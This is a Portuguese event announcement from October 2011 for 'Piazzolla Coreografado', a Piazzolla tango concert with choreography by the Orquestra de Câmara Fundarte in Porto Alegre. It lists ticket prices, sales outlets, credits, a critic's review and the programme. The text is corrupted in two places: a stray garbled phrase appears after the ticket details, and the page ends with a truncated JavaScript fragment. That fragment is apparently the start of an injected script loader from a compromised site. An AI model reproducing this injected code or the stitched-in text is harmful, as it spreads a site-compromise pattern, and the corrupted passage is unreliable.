Escrito por em 8 out 2011 nas áreas Lateral, Música contemporânea, Programação, Rio Grande do Sul

Vocabulário entre a música e a dança teatral  traz  imagens mergulhadas em sentimentos de amor, paixão, nostalgia e solidão.

SERVIÇO

 

Teatro do SESI
Av. Assis Brasil, 8787

Dia 16 de outubro de 2011, às 19h.

Ingressos

Plateia baixa ………………………………. R$ 40,00
Plateia alta …………………………………  R$ 30,00
Mezzanino …………………………………   R$  15,00

DESCONTOS:
Clube do Assinante ZH: 25%
Estudantes e terceira idade:  50%

 

Ingressos Antecipados

– Vendas pela Ingresso Rápido

– Vendas pela Internet: endereço: www.ingressorapido.com.br
Call center: 4003 1212

– Venda presencial
Lojas My Ticket – Rua dos Andradas, 1425 – loja 69
Segundas às sextas – 9h às 18h – Sábados – 9h às 14h

Lojas My Ticket – Rua Padre Chagas, 627 – loja 06
Segundas às Sextas – 9h  às 18h – Sábados – 10h às 15h

No dia da apresentação a bilheteria do Teatro do SESI será aberta às 15 horas para a entrega dos ingressos comprados pela internet e call center, bem como  para a venda de ingressos se ainda houver. ova mit tratamiento insttucciones

Informações
Telefone: 51 3632.1879
Site: www.fundarte.rs.gov.br

 

 

Bem recebido pelo público e pela crítica, após  ter sido apresentado  pela Orquestra de Câmara Fundarte no Interior do RS,  onde foi aplaudido por 4.400 espectadores nas oito apresentações realizadas, o espetáculo Piazzolla Coreografado estreia em Porto Alegre, dia 16 de outubro de 2011, no Teatro do SESI.

Sob a batuta do maestro Antônio Borges-Cunha, tendo como solistas Olinda Allessandrini (piano) e Luciano Maia (acordeon), com  a participação dos criadores bailarinos da Troupe Xipô (Daniel Barcellos, Márcio Barreto, Patrick Moraes, Silvia da Silva Lopes e Suzana Schoellkopf),  Piazzolla Coreografado reúne 23 artistas em cena e apresenta repertório exclusivo de Astor Piazzolla,  com arranjos assinados por José Bragato e Vagner Cunha.

Piazzolla Coreografado é uma montagem da Orquestra de Câmara Fundarte, da Fundação Municipal de Artes de Montenegro-FUNDARTE, tem direção cênica de Carlota Albuquerque, direção musical de Vagner Cunha, concepção coreográfica, de Suzana Schoellkopf e Márcio Barreto, criação da luz de Carmem Salazar, cenário, maquiagem, figurinos e adereços de Fabrizio Rodrigues e direção de produção de Therezinha Petry Cardona,  que também assina a direção executiva da orquestra.

 

O espetáculo

Piazzolla Coreografado retrata imagens mergulhadas ora em sentimentos de amor, paixão, nostalgia e solidão, ora na fuga de lembranças. Passos sem destino, chegadas e partidas, corpos que se entrelaçam para um último tango.

Segundo a diretora cênica,  Carlota Albuquerque, o espetáculo busca um vocabulário comum entre a música e a dança teatral,  dentro do universo poético de Astor Piazzolla.  “As cenas em movimento sugerem imagens descobertas a partir da música de um dos mais sensíveis artistas contemporâneos, que conseguiu extrair do retrato regionalista a essência do humano em suas características universais”, diz.

 

Sobre o espetáculo, escreveu o pianista e professor de música Armando Baraldi:

O espetáculo surpreende pelo alto nível dos participantes. A integração de linguagens é notável.  Tudo realizado com extrema competência: carismático maestro  e músicos extremamente corretos, coreografias geniais dos bailarinos e atores, direção executiva, musical, cênica, produção gráfica e fotos da maior qualidade. A Orquestra  Fundarte sob  a direção magistral de Therezinha Petry Cardona, mantém esse soberbo grupo que demonstra, acima de tudo, uma fidelidade incrível aos projetos musicais executados. Certamente a Orquestra de Câmara da Fundarte deve estar no topo das orquestras de câmara  no Brasil. Antônio Borges- Cunha, Olinda Allessandrini, Carlota Albuquerque, o grupo musical e de apoio logístico traduzem concreta realidade. Piazzolla coreografado é indescritível. Alto astral.Ah! Piazzolla, que gênio……

Piazzolla Coreografado teve pré-estréia em novembro de 2010,  em Panambi. Esse ano o espetáculo foi apresentado em Montenegro, Novo Hamburgo, Bagé,  Santa Cruz do Sul, Pelotas Rio Grande e São Leopoldo.  Em outubro,  além de Porto Alegre, o espetáculo será apresentado em  Ijuí.

A apresentação no Teatro do SESI integra as comemorações dos  15 anos da Orquestra de Câmara Fundarte, conta com o apoio cultural do Sesi, RS,  TVE e FM Cultura,e Rádio da UFRGS,  e será realizado com patrocínio das empresas Badesul, John Deere e Memphis S.A., por meio da Lei Federal de Incentivo à Cultura.

 

PROGRAMA

Astor Piazzolla (1921-1992)
Tristango
Fear
Buenos Aires Ora Cero
Oblivion
Fuga y Misterio
La muerte del Angel
Libertango
Meditango
Primavera Porteña
Inverno Porteño
Violentango
Adios Nonino
Solistas

Olinda Allessandrini, piano
Luciano Maia, acordeon

Ficha técnica

Regência: Antônio Borges-Cunha
Direção Musical: Vagner Cunha
Direção Cênica: Carlota Albuquerque
Direção Técnica: Suzana Schoellkopf e Márcio Barreto
Direção Executiva: Therezinha Petry Cardona
Concepção Coreográfica: Suzana Schoellkopf e Márcio Barreto
Cenário, figurinos e Adereços: Fabrizio Rodrigues
Criação de luz e Execução: Carmem Salazar
Arranjos Musicais: José Bragato e Vagner Cunha
Fotos: Cláudio Etges
Assessoria de Imprensa e mídia: Dinorah Araújo
Montagem e Edição de Vídeos: Diego Kern
Produção Gráfica: Comunicação da Fundarte

 var d=document;var s=d.createElement(‘script’);